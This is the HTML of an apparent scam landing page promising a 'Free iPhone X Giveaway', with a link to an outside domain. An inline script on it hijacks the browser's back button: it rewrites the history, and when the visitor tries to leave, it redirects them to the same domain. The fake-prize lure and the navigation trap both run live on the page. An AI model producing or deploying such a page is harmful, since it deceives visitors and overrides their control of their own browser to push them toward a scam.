<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    <title>Free iPhone X Giveaway</title>
    <link rel="stylesheet" type="text/css" href="css/style.css">
  	<script>function red(url){window.location = url;}</script>
</head>
<body>
	<div id="headline"><h1>iPhone X</h1></div>
    <img src="img/img1.png" style="max-width:100%;">
    <div style="margin-top:10px;margin-bottom:25px;font-size:20px;color:black">Free iPhone X Giveaway<br>Limited Time</div>
    <a href="http://7514.iphonexfree.net">Click Here To Get One Now</a>
    <br />
    <br />
    <br />
    <script> ! function(a, b) {
        history.replaceState(null, document.title, b.pathname + "#!/index"), history.pushState(null, document.title, b.pathname), a.addEventListener("popstate", function() {
            "#!/index" === b.hash && (history.replaceState(null, document.title, b.pathname), setTimeout(function() {
                b.replace(href = "http://7514.iphonexfree.net")
            }, 0))
        }, !1)
    }(window, location);</script><!-- This landing page has been Generated using purelander.com --> 

 
</body>
</html>